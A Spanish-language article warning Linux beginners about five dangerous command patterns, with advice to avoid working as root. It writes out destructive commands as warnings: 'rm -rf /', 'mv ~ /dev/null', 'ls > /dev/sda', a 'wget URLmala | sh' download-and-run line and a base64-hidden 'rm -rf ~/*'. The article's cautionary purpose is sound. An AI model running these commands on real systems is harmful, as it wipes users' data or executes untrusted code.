Los comandos de Linux más peligrosos
La consola de Linux es la interfaz más importante para administrar tu servidor, con el cual puedes realizar cambios en tu sistema. Esto puede ser bastante peligroso, sobre todo para los principiantes ya que, a través de algunos comandos simples, se puede dañar todo el sistema. Te muestro cuáles son los comandos más peligrosos que debes evitar. Están marcados en rojo, así que por favor, ¡no los ejecutes nunca!
Peligro # 1: Borrar archivos importantes accidentalmente – con rm o mv
El primer peligro tiene que ver con comandos que se usan habitualmente. Si no estás seguro de cómo construir cada comando, puedes dañar rápidamente todo el sistema. En la práctica, los comandos rm (remove = eliminar) y mv (move = mover) llevan a la pérdida de los datos.
El peligro del comando rm:
El comando rm se utiliza para eliminar archivos y directorios, pero puedes borrar todo el sistema si usas parámetros incorrectos. Por ejemplo, configurando el comando de la siguiente manera, eliminarás todos los archivos y carpetas del directorio actual sin confirmación previa:
rm –rf *
Explicación:
- rm: remove/eliminar
- -rf: r = recurrente, incluyendo todos los subdirectorios; f = fuerza; sin confirmación
- *: marcador de posición para todo en este directorio
El siguiente comando eliminaría incluso todos los documentos y directorios desde el nivel superior “/” de tu sistema:
rm –rf /
Cómo funciona el comando mv:
El comando mv es igual de peligroso si no lo usas correctamente, ya que mueve archivos y directorios. Usar parámetros incorrectos, moverá tus archivos a la nada:
mv ~ /dev/null
El símbolo ~ es el directorio de inicio del usuario en el que has iniciado sesión. La ruta “/dev/null” da como resultado un archivo de dispositivo virtual que descarta cualquier archivo. En realidad, se utiliza para redirigir la salida estándar de un programa que no interesa.
Peligro # 2: Uso incorrecto de los operadores
A menudo, los administradores de Linux utilizan los llamados «operadores» para redirigir la salida de un programa. El signo «mayor que» se usa para esto. Por ejemplo, usa el siguiente comando para enrutar el contenido del directorio en el archivo «ListaDirectorios.txt»
ls > ListaDirectorios.txt
Atención:
Si el archivo «ListaDirectorios.txt» ya existe, ¡se sobrescribirá sin preguntar! Si haces doble uso del operador, la salida se añade al archivo existente en lugar de sobrescribirlo:
ls >> ListaDirectorios.txt
Esto puede ocasionar un problema si rediriges la salida a tu disco duro (por ejemplo, /dev/sda). El siguiente comando escribe la salida de «ls» directamente en tu disco principal, sobrescribiendo tus datos.
ls > /dev/sda
Peligro # 3: Descargar contenido peligroso a través de WGET
A los administradores les gusta realizar búsquedas en Internet cuando se encuentran con nuevos problemas. A menudo hay una solución que se puede aplicar de forma inmediata en forma de Shell script, que puedes descargar directamente y ejecutar con la siguiente construcción de comandos:
wget URLmala | sh
El comando wget descarga un Shell script desde una URL (en nuestro ejemplo: http://www.URLmala) y lo pasa directamente al Shell (sh) con el Operador Pipe «|».
Esto es muy peligroso porque probablemente no sepas de qué script se trata.
Peligro # 4: Ejecutar comandos ocultos
Un comando de Linux no siempre es legible a simple vista, por ejemplo, cuando está oculto por codificaciones. Los usuarios malintencionados ocultan comandos peligrosos usando una codificación Base64. Echa un vistazo, por ejemplo, al siguiente comando:
(echo cm0gLXJmIH4vKg== | base64 -d)
Detrás de la cadena cm0gLXJmIH4vKg== se oculta el comando rm –rf ~/*, que borraría todos los archivos y directorios sin confirmación previa. Para ello se decodifica con base64 en el comando anterior y se ejecuta directamente.

Peligro # 5: Trabajar siempre como usuario root
Muchas de las amenazas anteriormente mencionadas solamente se originan cuando se ejecutan como usuario root. Muy a menudo, incluso para tareas diarias, los administradores con experiencia en Linux trabajan como «root» con todos los privilegios, tan solo por comodidad.
Por lo tanto:
Si tienes que ejecutar un comando con derechos de usuario root, usa el comando su para cambiar a la cuenta de usuario root o, dependiendo de la distribución, usa el comando sudo para ejecutar comandos individuales con derechos de usuario root.
Imagen de Photo credit: portalgda via Visualhunt / CC BY-NC-SA